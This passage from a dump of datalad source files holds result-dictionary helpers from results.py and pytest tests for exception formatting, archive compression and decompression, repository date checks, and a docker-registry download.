Optional[str] = None,\n type: Optional[str] = None,\n logger: Optional[logging.Logger] = None,\n refds: Optional[str] = None,\n status: Optional[str] = None,\n message: str | tuple | None = None,\n exception: Exception | CapturedException | None = None,\n error_message: str | tuple | None = None,\n **kwargs: Any,\n) -> dict[str, Any]:\n # `type` is intentionally not `type_` or something else, as a mismatch\n # with the dict key 'type' causes too much pain all over the place\n # just for not shadowing the builtin `type` in this function\n \"\"\"Helper to create a result dictionary.\n\n Most arguments match their key in the resulting dict, and their given\n values are simply assigned to the result record under these keys. Only\n exceptions are listed here.\n\n Parameters\n ----------\n ds\n If given, the `path` and `type` values are populated with the path of the\n datasets and 'dataset' as the type. Giving additional values for both\n keys will overwrite these pre-populated values.\n exception\n Exceptions that occurred while generating a result should be captured\n by immediately instantiating a CapturedException. This instance can\n be passed here to yield more comprehensive error reporting, including\n an auto-generated traceback (added to the result record under an\n 'exception_traceback' key). Exceptions of other types are also supported.\n\n Returns\n -------\n dict\n \"\"\"\n\n d: dict[str, Any] = {}\n if action is not None:\n d['action'] = action\n if ds:\n d['path'] = ds.path\n d['type'] = 'dataset'\n # now overwrite automatic\n if path is not None:\n d['path'] = path\n if type:\n d['type'] = type\n if logger:\n d['logger'] = logger\n if refds:\n d['refds'] = refds\n if status is not None:\n # TODO check for known status label\n d['status'] = status\n if message is not None:\n d['message'] = message\n if error_message is not None:\n d['error_message'] = error_message\n if exception is not None:\n d['exception'] = exception\n d['exception_traceback'] = exception.format_oneline_tb(\n include_str=False) \\\n if isinstance(exception, CapturedException) \\\n else format_oneline_tb(\n exception, include_str=False)\n if error_message is None and isinstance(exception, CapturedException):\n d['error_message'] = exception.message\n if isinstance(exception, CommandError):\n d['exit_code'] = exception.code\n if kwargs:\n d.update(kwargs)\n return d\n\n\ndef results_from_paths(\n paths: str | list[str],\n action: Optional[str] = None,\n type: Optional[str] = None,\n logger: Optional[logging.Logger] = None,\n refds: Optional[str]=None,\n status: Optional[str] = None,\n message: Optional[str] = None,\n exception: Exception | CapturedException | None = None,\n) -> Iterator[dict[str, Any]]:\n \"\"\"\n Helper to yield analog result dicts for each path in a sequence.\n\n Parameters\n ----------\n message: str\n A result message. May contain `%s` which will be replaced by the\n respective `path`.\n\n Returns\n -------\n generator\n\n \"\"\"\n for p in ensure_list(paths):\n yield get_status_dict(\n action, path=p, type=type, logger=logger, refds=refds,\n status=status, message=(message, p) if message is not None and '%s' in message else message,\n exception=exception\n )\n\n\ndef is_ok_dataset(r: dict) -> bool:\n \"\"\"Convenience test for a non-failure dataset-related result dict\"\"\"\n return r.get('status', None) == 'ok' and r.get('type', None) == 'dataset'\n\n\nclass ResultXFM:\n \"\"\"Abstract definition of the result transformer API\"\"\"\n\n def __call__(self, res: dict[str, Any]) -> Any:\n \"\"\"This is called with one result dict at a time\"\"\"\n raise NotImplementedError\n\n\nclass YieldDatasets(ResultXFM):\n \"\"\"Result transformer to return a Dataset instance from matching result.\n\n If the `success_only` flag is given only dataset with 'ok' or 'notneeded'\n status are returned'.\n\n `None` is returned for any other result.\n \"\"\"\n def __init__(self, success_only: bool = False) -> None:\n self.success_only = success_only\n\n def __call__(self, res: dict[str, Any]) -> Optional[Dataset]:\n if res.get('type', None) == 'dataset':\n if not self.success_only or \\\n res.get('status', None) in ('ok', 'notneeded'):\n return Dataset(res['path'])\n else:\n return None\n else:\n lgr.debug('rejected by return value configuration: %s', res)\n return None\n\n\nclass YieldRelativePaths(ResultXFM):\n \"\"\"Result transformer to return relative paths for a result\n\n Relative paths are determined from the 'refds' value in the result. If\n no such value is found, `None` is returned.\n \"\"\"\n def __call__(self, res: dict[str, Any]) -> Optional[str]:\n refpath = res.get('refds', None)\n if refpath:\n return relpath(res['path'], start=refpath)\n else:\n return None\n\n\nclass YieldField(ResultXFM):\n \"\"\"Result transformer to return an arbitrary value from a result dict\"\"\"\n def __init__(self, field: str) -> None:\n \"\"\"\n Parameters\n ----------\n field : str\n Key of the field to return.\n \"\"\"\n self.field = field\n\n def __call__(self, res: dict[str, Any]) -> Any:\n if self.field in res:\n return res[self.field]\n else:\n lgr.debug('rejected by return value configuration: %s', res)\n return None\n\n\n# a bunch of convenience labels for common result transformers\n# the API `result_xfm` argument understand any of these labels and\n# applied the corresponding callable\nknown_result_xfms = {\n 'datasets': YieldDatasets(),\n 'successdatasets-or-none': YieldDatasets(success_only=True),\n 'paths': YieldField('path'),\n 'relpaths': YieldRelativePaths(),\n 'metadata': YieldField('metadata'),\n}\n\ntranslate_annex_notes = {\n '(Use --force to override this check, or adjust numcopies.)':\n 'configured minimum number of copies not found',\n}\n\n\ndef annexjson2result(d: dict[str, Any], ds: Dataset, **kwargs: Any) -> dict[str, Any]:\n \"\"\"Helper to convert an annex JSON result to a datalad result dict\n\n Info from annex is rather heterogeneous, partly because some of it\n our support functions are faking.\n\n This helper should be extended with all needed special cases to\n homogenize the information.\n\n Parameters\n ----------\n d : dict\n Annex info dict.\n ds : Dataset instance\n Used to determine absolute paths for `file` results. This dataset\n is not used to set `refds` in the result, pass this as a separate\n kwarg if needed.\n **kwargs\n Passes as-is to `get_status_dict`. Must not contain `refds`.\n \"\"\"\n lgr.debug('received JSON result from annex: %s', d)\n messages = []\n res = get_status_dict(**kwargs)\n res['status'] = 'ok' if d.get('success', False) is True else 'error'\n # we cannot rely on any of these to be available as the feed from\n # git annex (or its wrapper) is not always homogeneous\n if d.get('file'):\n res['path'] = str(ds.pathobj / PurePosixPath(d['file']))\n if 'command' in d:\n res['action'] = d['command']\n if 'key' in d:\n res['annexkey'] = d['key']\n if 'fields' in d:\n # this is annex metadata, filter out timestamps\n res['metadata'] = {k: v[0] if isinstance(v, list) and len(v) == 1 else v\n for k, v in d['fields'].items()\n if not k.endswith('lastchanged')}\n if d.get('error-messages', None):\n res['error_message'] = '\\n'.join(m.strip() for m in d['error-messages'])\n # avoid meaningless standard messages, and collision with actual error\n # messages\n elif 'note' in d:\n note = \"; \".join(ln for ln in d['note'].splitlines()\n if ln != 'checksum...'\n and not ln.startswith('checking file'))\n if note:\n messages.append(translate_annex_notes.get(note, note))\n if messages:\n res['message'] = '\\n'.join(m.strip() for m in messages)\n return res\n\n\ndef count_results(res: Iterable[dict[str, Any]], **kwargs: Any) -> int:\n \"\"\"Return number of results that match all property values in kwargs\"\"\"\n return sum(\n all(k in r and r[k] == v for k, v in kwargs.items()) for r in res)\n\n\ndef only_matching_paths(res: dict[str, Any], **kwargs: Any) -> bool:\n # TODO handle relative paths by using a contained 'refds' value\n paths = ensure_list(kwargs.get('path', []))\n respath = res.get('path', None)\n return respath in paths\n\n\n# needs decorator, as it will otherwise bind to the command classes that use it\n@staticmethod # type: ignore[misc]\ndef is_result_matching_pathsource_argument(res: dict[str, Any], **kwargs: Any) -> bool:\n # we either have any non-zero number of \"paths\" (that could be anything), or\n # we have one path and one source\n # we don't do any error checking here, done by the command itself\n if res.get('action', None) not in ('install', 'get'):\n # this filter is only used in install, reject anything that comes\n # in that could not possibly be a 'install'-like result\n # e.g. a sibling being added in the process\n return False\n source = kwargs.get('source', None)\n if source is not None:\n # we want to be able to deal with Dataset instances given as 'source':\n if isinstance(source, Dataset):\n source = source.path\n # if there was a source, it needs to be recorded in the result\n # otherwise this is not what we are looking for\n return source == res.get('source_url', None)\n # the only thing left is a potentially heterogeneous list of paths/URLs\n paths = ensure_list(kwargs.get('path', []))\n # three cases left:\n # 1. input arg was an absolute path -> must match 'path' property\n # 2. input arg was relative to a dataset -> must match refds/relpath\n # 3. something nifti with a relative input path that uses PWD as the\n # reference\n respath = res.get('path', None)\n if respath in paths:\n # absolute match, pretty sure we want this\n return True\n elif isinstance(kwargs.get('dataset', None), Dataset) and \\\n YieldRelativePaths()(res) in paths:\n # command was called with a reference dataset, and a relative\n # path of a result matches in input argument -- not 100% exhaustive\n # test, but could be good enough\n return True\n elif any(robust_abspath(p) == respath for p in paths):\n # one absolutified input path matches the result path\n # I'd say: got for it!\n return True\n elif any(p == res.get('source_url', None) for p in paths):\n # this was installed from a URL that was given, we'll take that too\n return True\n else:\n return False\n\n\ndef results_from_annex_noinfo(\n ds: Dataset,\n requested_paths: list[str],\n respath_by_status: dict[str, list[str]],\n dir_fail_msg: str,\n noinfo_dir_msg: str,\n noinfo_file_msg: str,\n noinfo_status: str = 'notneeded',\n **kwargs: Any\n) -> Iterator[dict[str, Any]]:\n \"\"\"Helper to yield results based on what information git annex did no give us.\n\n The helper assumes that the annex command returned without an error code,\n and interprets which of the requested paths we have heard nothing about,\n and assumes that git annex was happy with their current state.\n\n Parameters\n ==========\n ds : Dataset\n All results have to be concerning this single dataset (used to resolve\n relpaths).\n requested_paths : list\n List of path arguments sent to `git annex`\n respath_by_status : dict\n Mapping of 'success' or 'failure' labels to lists of result paths\n reported by `git annex`. Everything that is not in here, we assume\n that `git annex` was happy about.\n dir_fail_msg : str\n Message template to inject into the result for a requested directory where\n a failure was reported for some of its content. The template contains two\n string placeholders that will be expanded with 1) the path of the\n directory, and 2) the content failure paths for that directory\n noinfo_dir_msg : str\n Message template to inject into the result for a requested directory that\n `git annex` was silent about (incl. any content). There must be one string\n placeholder that is expanded with the path of that directory.\n noinfo_file_msg : str\n Message to inject into the result for a requested file that `git\n annex` was silent about.\n noinfo_status : str\n Status to report when annex provides no information\n **kwargs\n Any further kwargs are included in the yielded result dictionary.\n \"\"\"\n for p in requested_paths:\n # any relpath is relative to the currently processed dataset\n # not the global reference dataset\n p = p if isabs(p) else normpath(opj(ds.path, p))\n if any(p in ps for ps in respath_by_status.values()):\n # we have a report for this path already\n continue\n common_report = dict(path=p, **kwargs)\n if isdir(p):\n # `annex` itself will not report on directories, but if a\n # directory was requested, we want to say something about\n # it in the results. we are inside a single, existing\n # repo, hence all directories are already present, if not\n # we had an error\n # do we have any failures in a subdir of the requested dir?\n failure_results = [\n fp for fp in respath_by_status.get('failure', [])\n if path_is_subpath(fp, p)]\n if failure_results:\n # we were not able to process all requested_paths, let's label\n # this 'impossible' to get a warning-type report\n # after all we have the directory itself, but not\n # (some) of its requested_paths\n yield get_status_dict(\n status='impossible', type='directory',\n message=(dir_fail_msg, p, failure_results),\n **common_report)\n else:\n # otherwise cool, but how cool?\n success_results = [\n fp for fp in respath_by_status.get('success', [])\n if path_is_subpath(fp, p)]\n yield get_status_dict(\n status='ok' if success_results else noinfo_status,\n message=None if success_results else (noinfo_dir_msg, p),\n type='directory', **common_report)\n continue\n else:\n # not a directory, and we have had no word from `git annex`,\n # yet no exception, hence the file was most probably\n # already in the desired state\n yield get_status_dict(\n status=noinfo_status, type='file',\n message=noinfo_file_msg,\n **common_report)\n\n\nlgr.log(5, \"Done importing datalad.interface.results\")\n" }, { "alpha_fraction": 0.6269466876983643, "alphanum_fraction": 0.6399244666099548, "avg_line_length": 35.22222137451172, "blob_id": "0492ffd3ff73c4f5a1178fb9872defd6142f235c", "content_id": "753c7faf5050cae6a43fe5081c61561790667735", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4238, "license_type": "permissive", "max_line_length": 213, "num_lines": 117, "path": "/datalad/support/tests/test_captured_exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from unittest.mock import patch\n\nfrom datalad import cfg\nfrom datalad.support.exceptions import (\n CapturedException,\n format_exception_with_cause,\n)\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_re_in,\n assert_true,\n)\n\n\ndef test_CapturedException():\n\n try:\n raise Exception(\"BOOM\")\n except Exception as e:\n captured_exc = CapturedException(e)\n\n assert_re_in(r\"BOOM \\[test_captured_exception.py:test_CapturedException:[0-9]+\\]\", captured_exc.format_oneline_tb())\n assert_re_in(r\"^\\[.*\\]\", captured_exc.format_oneline_tb(include_str=False)) # only traceback\n\n try:\n raise NotImplementedError\n except Exception as e:\n captured_exc = CapturedException(e)\n\n assert_re_in(r\"NotImplementedError \\[test_captured_exception.py:test_CapturedException:[0-9]+\\]\", captured_exc.format_oneline_tb())\n\n def f():\n def f2():\n raise Exception(\"my bad again\")\n try:\n f2()\n except Exception as e:\n # exception chain\n raise RuntimeError(\"new message\") from e\n\n try:\n f()\n except Exception as e:\n captured_exc = CapturedException(e)\n\n # default limit: one level:\n estr1 = captured_exc.format_oneline_tb(limit=1)\n estr2 = captured_exc.format_oneline_tb(limit=2)\n # and we can control it via environ/config by default\n try:\n with patch.dict('os.environ', {'DATALAD_EXC_STR_TBLIMIT': '3'}):\n cfg.reload()\n estr3 = captured_exc.format_oneline_tb()\n with patch.dict('os.environ', {}, clear=True):\n cfg.reload()\n estr_ = captured_exc.format_oneline_tb()\n finally:\n cfg.reload() # make sure we don't have a side effect on other tests\n\n estr_full = captured_exc.format_oneline_tb(10)\n\n assert_re_in(r\"new message \\[test_captured_exception.py:test_CapturedException:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr_full)\n assert_re_in(r\"new message \\[test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr3)\n assert_re_in(r\"new message \\[test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr2)\n assert_re_in(r\"new message \\[test_captured_exception.py:f2:[0-9]+\\]\", estr1)\n # default: no limit:\n assert_equal(estr_, estr_full)\n\n # standard output\n full_display = captured_exc.format_standard().splitlines()\n\n assert_equal(full_display[0], \"Traceback (most recent call last):\")\n # points in f and f2 for first exception with two lines each\n # (where is the line and what reads the line):\n assert_true(full_display[1].lstrip().startswith(\"File\"))\n assert_equal(full_display[2].strip(), \"f2()\")\n assert_true(full_display[3].lstrip().startswith(\"File\"))\n assert_equal(full_display[4].strip(), \"raise Exception(\\\"my bad again\\\")\")\n assert_equal(full_display[5].strip(), \"Exception: my bad again\")\n assert_equal(full_display[7].strip(), \"The above exception was the direct cause of the following exception:\")\n assert_equal(full_display[9], \"Traceback (most recent call last):\")\n # ...\n assert_equal(full_display[-1].strip(), \"RuntimeError: new message\")\n\n # CapturedException.__repr__:\n assert_re_in(r\".*test_captured_exception.py:f2:[0-9]+\\]$\",\n captured_exc.__repr__())\n\n\ndef makeitraise():\n def raise_valueerror():\n try:\n raise_runtimeerror()\n except Exception as e:\n raise ValueError from e\n\n def raise_runtimeerror():\n raise RuntimeError(\"Mike\")\n\n try:\n raise_valueerror()\n except Exception as e:\n raise RuntimeError from e\n\n\ndef test_format_exception_with_cause():\n try:\n makeitraise()\n except Exception as e:\n assert_equal(\n format_exception_with_cause(e),\n 'RuntimeError -caused by- ValueError -caused by- Mike')\n # make sure it also works with TracebackException/CapturedException:\n ce = CapturedException(e)\n assert_equal(\n ce.format_with_cause(),\n 'RuntimeError -caused by- ValueError -caused by- Mike')\n" }, { "alpha_fraction": 0.6049097776412964, "alphanum_fraction": 0.6123583912849426, "avg_line_length": 33.0428581237793, "blob_id": "06882c79846e8bf7ae8deb1ca48c743115205145", "content_id": "ade7a70caa81ee5b8e5365191d7454d5ff6294c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9532, "license_type": "permissive", "max_line_length": 109, "num_lines": 280, "path": "/datalad/tests/test_archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport itertools\nimport os\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support import path as op\nfrom datalad.support.archive_utils_patool import unixify_path\nfrom datalad.support.archives import (\n ArchivesCache,\n ExtractedArchive,\n compress_files,\n decompress_file,\n)\nfrom datalad.support.exceptions import MissingExternalDependency\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_false,\n assert_raises,\n assert_true,\n eq_,\n ok_file_has_content,\n ok_generator,\n on_nfs,\n on_travis,\n on_windows,\n skip_if,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\n\nfn_in_archive_obscure = OBSCURE_FILENAME\nfn_archive_obscure = fn_in_archive_obscure.replace('a', 'b')\n# Debian sid version of python (3.7.5rc1) introduced a bug in mimetypes\n# Reported to cPython: https://bugs.python.org/issue38449\nimport mimetypes\n\nmimedb = mimetypes.MimeTypes(strict=False)\nif None in mimedb.guess_type(fn_archive_obscure + '.tar.gz'):\n from . import lgr\n lgr.warning(\"Buggy Python mimetypes, replacing ; in archives test filename\")\n # fails to detect due to ;\n fn_archive_obscure = fn_archive_obscure.replace(';', '-')\n # verify\n assert None not in mimedb.guess_type(fn_archive_obscure + '.tar.gz')\nfn_archive_obscure_ext = fn_archive_obscure + '.tar.gz'\n\ntree_simplearchive = dict(\n tree=(\n (fn_archive_obscure_ext, (\n (fn_in_archive_obscure, '2 load'),\n ('3.txt', '3 load'))),),\n prefix='datalad-')\n\nif on_windows:\n\n def test_unixify_path():\n from ..tests.utils_pytest import eq_\n eq_(unixify_path(r\"a\"), \"a\")\n eq_(unixify_path(r\"c:\\buga\"), \"/c/buga\")\n eq_(unixify_path(r\"c:\\buga\\duga.dat\"), \"/c/buga/duga.dat\")\n eq_(unixify_path(r\"buga\\duga.dat\"), \"buga/duga.dat\")\n\n\n@with_tree(**tree_simplearchive)\ndef check_decompress_file(leading_directories, path=None):\n outdir = op.join(path, 'simple-extracted')\n\n with swallow_outputs() as cmo:\n decompress_file(op.join(path, fn_archive_obscure_ext), outdir,\n leading_directories=leading_directories)\n eq_(cmo.out, \"\")\n eq_(cmo.err, \"\")\n\n path_archive_obscure = op.join(outdir, fn_archive_obscure)\n if leading_directories == 'strip':\n assert not op.exists(path_archive_obscure)\n testpath = outdir\n elif leading_directories is None:\n assert op.exists(path_archive_obscure)\n testpath = path_archive_obscure\n else:\n raise NotImplementedError(\"Dunno about this strategy: %s\"\n % leading_directories)\n\n assert op.exists(op.join(testpath, '3.txt'))\n assert op.exists(op.join(testpath, fn_in_archive_obscure))\n with open(op.join(testpath, '3.txt')) as f:\n eq_(f.read(), '3 load')\n\n\[email protected](on_travis and on_nfs, reason=\"https://github.com/datalad/datalad/issues/4496\")\[email protected](\"leading\", [None, 'strip'])\ndef test_decompress_file(leading):\n return check_decompress_file(leading)\n\n\ndef test_decompress_file_unknown():\n with pytest.raises(NotImplementedError):\n check_decompress_file(\"unknown\")\n\n\n@with_tree((('empty', ''),\n ('d1', (\n ('d2', (\n ('f1', 'f1 load'),\n ),),\n ))))\n@with_tempfile()\ndef check_compress_dir(ext, path=None, name=None):\n archive = name + ext\n compress_files([os.path.basename(path)], archive,\n path=os.path.dirname(path))\n assert_true(op.exists(archive))\n name_extracted = name + \"_extracted\"\n decompress_file(archive, name_extracted, leading_directories='strip')\n assert_true(op.exists(op.join(name_extracted, 'empty')))\n assert_true(op.exists(op.join(name_extracted, 'd1', 'd2', 'f1')))\n\n\[email protected](\n \"ext\",\n ['.tar.xz',\n '.tar.gz',\n '.tgz',\n '.tbz2',\n '.tar',\n '.zip',\n '.7z',\n ]\n)\ndef test_compress_dir(ext):\n return check_compress_dir(ext)\n\n\n# space in the filename to test for correct quotations etc\n_filename = 'fi le.dat'\n\n\n@skip_if(\"cmd:7z\" not in external_versions,\n msg=\"Known to fail if p7zip is not installed\")\n@with_tree(((_filename, 'content'),))\n@with_tempfile()\ndef check_compress_file(ext, annex, path=None, name=None):\n # we base the archive name on the filename, in order to also\n # be able to properly test compressors where the corresponding\n # archive format has no capability of storing a filename\n # (i.e. where the archive name itself determines the filename\n # of the decompressed file, like .xz)\n archive = op.join(name, _filename + ext)\n compress_files([_filename], archive,\n path=path)\n assert_true(op.exists(archive))\n if annex:\n # It should work even when file is annexed and is a symlink to the\n # key\n from datalad.support.annexrepo import AnnexRepo\n repo = AnnexRepo(path, init=True)\n repo.add(_filename)\n repo.commit(files=[_filename], msg=\"commit\")\n\n dir_extracted = name + \"_extracted\"\n try:\n decompress_file(archive, dir_extracted)\n except MissingExternalDependency as exc:\n raise SkipTest() from exc\n _filepath = op.join(dir_extracted, _filename)\n\n ok_file_has_content(_filepath, 'content')\n\n\[email protected](\n \"ext,annex\",\n list(\n itertools.product(\n ['.xz', '.gz', '.zip', '.7z'],\n [True, False])\n )\n)\ndef test_compress_file(ext, annex):\n check_compress_file(ext, annex)\n\n\n@with_tree(**tree_simplearchive)\ndef test_ExtractedArchive(path=None):\n archive = op.join(path, fn_archive_obscure_ext)\n earchive = ExtractedArchive(archive)\n assert_false(op.exists(earchive.path))\n # no longer the case -- just using hash for now\n # assert_in(os.path.basename(archive), earchive.path)\n\n fpath = op.join(fn_archive_obscure, # lead directory\n fn_in_archive_obscure)\n extracted = earchive.get_extracted_filename(fpath)\n eq_(extracted, op.join(earchive.path, fpath))\n assert_false(op.exists(extracted)) # not yet\n\n extracted_ = earchive.get_extracted_file(fpath)\n eq_(extracted, extracted_)\n assert_true(op.exists(extracted)) # now it should\n\n extracted_files = earchive.get_extracted_files()\n ok_generator(extracted_files)\n try:\n eq_(sorted(extracted_files),\n sorted([\n # ['bbc/3.txt', 'bbc/abc']\n op.join(fn_archive_obscure, fn_in_archive_obscure),\n op.join(fn_archive_obscure, '3.txt')\n ]))\n except AssertionError:\n if 'nfsmount' in fpath:\n pytest.xfail(\"Archive was created before NFS startede to behave. \"\n \"https://github.com/datalad/datalad/issues/4101\")\n raise\n\n earchive.clean()\n if not dl_cfg.get('datalad.tests.temp.keep'):\n assert_false(op.exists(earchive.path))\n\n\ndef test_ArchivesCache():\n # we don't actually need to test archives handling itself\n path1 = \"/zuba/duba\"\n path2 = \"/zuba/duba2\"\n # should not be able to create a persistent cache without topdir\n assert_raises(ValueError, ArchivesCache, persistent=True)\n cache = ArchivesCache() # by default -- non persistent\n\n archive1_path = op.join(path1, fn_archive_obscure_ext)\n archive2_path = op.join(path2, fn_archive_obscure_ext)\n cached_archive1_path = cache[archive1_path].path\n assert_false(cache[archive1_path].path == cache[archive2_path].path)\n assert_true(cache[archive1_path] is cache[archive1_path])\n cache.clean()\n assert_false(op.exists(cached_archive1_path))\n assert_false(op.exists(cache.path))\n\n # test del\n cache = ArchivesCache() # by default -- non persistent\n assert_true(op.exists(cache.path))\n cache_path = cache.path\n del cache\n assert_false(op.exists(cache_path))\n\n\[email protected](\n \"return_value,target_value,kwargs\",\n [\n ([], None, {}),\n (['file.txt'], None, {}),\n (['file.txt', op.join('d', 'f')], None, {}),\n ([op.join('d', 'f'), op.join('d', 'f2')], 'd', {}),\n ([op.join('d', 'f'), op.join('d', 'f2')], 'd', {'consider': 'd'}),\n ([op.join('d', 'f'), op.join('d', 'f2')], None, {'consider': 'dd'}),\n ([op.join('d', 'f'), op.join('d2', 'f2')], None, {}),\n ([op.join('d', 'd2', 'f'), op.join('d', 'd2', 'f2')], op.join('d', 'd2'), {}),\n ([op.join('d', 'd2', 'f'), op.join('d', 'd2', 'f2')], 'd', {'depth': 1}),\n # with some parasitic files\n ([op.join('d', 'f'), op.join('._d')], 'd', {'exclude': [r'\\._.*']}),\n ([op.join('d', 'd1', 'f'), op.join('d', '._d'), '._x'], op.join('d', 'd1'), {'exclude': [r'\\._.*']}),\n ]\n)\ndef test_get_leading_directory(return_value, target_value, kwargs):\n ea = ExtractedArchive('/some/bogus', '/some/bogus')\n with patch.object(ExtractedArchive, 'get_extracted_files', return_value=return_value):\n eq_(ea.get_leading_directory(**kwargs), target_value)\n" }, { "alpha_fraction": 0.5721290111541748, "alphanum_fraction": 0.5785806179046631, "avg_line_length": 33.909908294677734, "blob_id": "0b515a8e7a004e41f6560f35929031cca8dfd8bf", "content_id": "cf6078306a98487e0fc848a9ef4e2eee73236fe9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3875, "license_type": "permissive", "max_line_length": 87, "num_lines": 111, "path": "/datalad/support/tests/test_repodates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom unittest.mock import patch\n\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.repodates import check_dates\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n eq_,\n ok_,\n set_date,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_check_dates_empty_repo(path=None):\n assert_false(check_dates(GitRepo(path, create=True))[\"objects\"])\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_check_dates(path=None):\n refdate = 1218182889\n\n with set_date(refdate - 1):\n ar = AnnexRepo(path, create=True)\n\n def tag_object(tag):\n \"\"\"Return object for tag. Do not dereference it.\n \"\"\"\n # We can't use ar.get_tags because that returns the commit's hexsha,\n # not the tag's, and ar.get_hexsha is limited to commit objects.\n return ar.call_git_oneline(\n [\"rev-parse\", \"refs/tags/{}\".format(tag)], read_only=True)\n\n ar.add(\"foo\")\n ar.commit(\"add foo\")\n foo_commit = ar.get_hexsha()\n ar.commit(\"add foo\")\n ar.tag(\"foo-tag\", \"tag before refdate\")\n foo_tag = tag_object(\"foo-tag\")\n # Make a lightweight tag to make sure `tag_dates` doesn't choke on it.\n ar.tag(\"light\")\n with set_date(refdate + 1):\n ar.add(\"bar\")\n ar.commit(\"add bar\")\n bar_commit = ar.get_hexsha()\n ar.tag(\"bar-tag\", \"tag after refdate\")\n bar_tag = tag_object(\"bar-tag\")\n with set_date(refdate + 2):\n # Drop an annexed file so that we have more blobs in the git-annex\n # branch than its current tree.\n ar.drop(\"bar\", options=[\"--force\"])\n\n results = {}\n for which in [\"older\", \"newer\"]:\n result = check_dates(ar, refdate, which=which)[\"objects\"]\n ok_(result)\n if which == \"newer\":\n assert_in(bar_commit, result)\n assert_not_in(foo_commit, result)\n assert_in(bar_tag, result)\n elif which == \"older\":\n assert_in(foo_commit, result)\n assert_not_in(bar_commit, result)\n assert_in(foo_tag, result)\n results[which] = result\n\n ok_(any(x.get(\"filename\") == \"uuid.log\"\n for x in results[\"older\"].values()))\n\n newer_tree = check_dates(ar, refdate, annex=\"tree\")[\"objects\"]\n\n def is_annex_log_blob(entry):\n return (entry[\"type\"] == \"annex-blob\"\n and entry[\"filename\"].endswith(\".log\"))\n\n def num_logs(entries):\n return sum(map(is_annex_log_blob, entries.values()))\n\n # Because we dropped bar above, we should have one more blob in the\n # git-annex branch than in the current tree of the git-annex branch.\n eq_(num_logs(results[\"newer\"]) - num_logs(newer_tree), 1)\n\n # Act like today is one day from the reference timestamp to check that we\n # get the same results with the one-day-back default.\n seconds_in_day = 60 * 60 * 24\n with patch('time.time', return_value=refdate + seconds_in_day):\n assert_equal(check_dates(ar, annex=\"tree\")[\"objects\"],\n newer_tree)\n\n # We can give a path (str) instead of a GitRepo object.\n assert_equal(check_dates(path, refdate, annex=\"tree\")[\"objects\"],\n newer_tree)\n\n with assert_raises(ValueError):\n check_dates(ar, refdate, which=\"unrecognized\")\n" }, { "alpha_fraction": 0.5887276530265808, "alphanum_fraction": 0.6183035969734192, "avg_line_length": 32.81132125854492, "blob_id": "90b026734af3587da32cf13a42922d746ee47165", "content_id": "f2a2ba345fc94014564bb33ec4693d972b53cfc9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "permissive", "max_line_length": 87, "num_lines": 53, "path": "/datalad/downloaders/tests/test_docker_registry.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the docker-registry:// downloader\"\"\"\n\nimport os\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n eq_,\n integration,\n patch_config,\n skip_if,\n skip_if_no_network,\n slow,\n with_tempfile,\n)\n\n\n@skip_if(os.environ.get(\"TRAVIS_EVENT_TYPE\") != \"cron\" and\n os.environ.get(\"GITHUB_EVENT_NAME\") != \"schedule\",\n \"run restricted cron due to rate limiting\")\n@skip_if_no_network\n@slow # ~7s\n@integration\n@with_tempfile(mkdir=True)\ndef test_download_docker_blob(path=None):\n from datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n )\n from datalad.customremotes.base import init_datalad_remote\n\n with patch_config({\"datalad.repo.backend\": \"SHA256E\"}):\n ds = Dataset(path).create()\n ds_repo = ds.repo\n init_datalad_remote(ds_repo, DATALAD_SPECIAL_REMOTE)\n\n 